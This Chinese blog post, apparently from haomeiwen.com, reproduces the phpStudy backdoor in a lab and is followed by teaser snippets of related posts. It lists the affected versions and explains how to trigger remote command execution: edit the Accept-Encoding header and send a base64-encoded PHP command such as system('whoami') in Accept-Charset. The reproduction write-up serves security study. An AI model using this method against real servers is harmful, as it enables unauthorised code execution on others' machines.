ps:当时出的时候就复现了,但是由于种种原因(当初粗心,没好好留意)没有成功,今天终于成功了
目前已知受影响的phpstudy版本
phpstudy 2016版php-5.4
phpstudy 2018版php-5.2.17
phpstudy 2018版php-5.4.45
这里用phpstudy 2018版php-5.2.17
安装完成之后随便访问php文件,然后burp抓包
这里要注意的有两点,deflate前面的空格需要删除(最开始就是忘记了这里),然后添加一个accept-charset:base64加密后的命令
system('whoami') ;base64加密之后是c3lzdGVtKCd3aG9hbWknKSA7,成功返回
ps:当时出的时候就复现了,但是由于种种原因(当初粗心,没好好留意)没有成功,今天终于成功了 目前已知受影响的ph...
phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache、PHP...
小白白也要复现! phpstudy简介 phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apa...
漏洞简介 关于phpStudy的后门漏洞可参考https://blog.csdn.net/weixin_43886...
GET / HTTP/1.1 Host: 0.0.0.0 User-Agent: Mozilla/5.0 (Win...
随意访问任何一个文件 0x01 Accept-Encoding字段中,gzip和deflate之间的逗号后的空格去...
漏洞版本Phpstudy 2016版 php-5.4Phpstudy 2018版 php-5.2.17Phps...
最近跟着大佬的博客复现了下粘滞键后门的攻击场景,这里做个记录。 环境 Windows 10 概念&原理 粘滞键[h...
1.事件背景 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、My...
下载bWAPP这个实验环境,这个是使用php的环境用phpstudy就能很简单的搭建了(其他的版本有后门,还请用新...
本文标题:phpstudy后门复现
本文链接:https://www.haomeiwen.com/subject/qpswactx.html
网友评论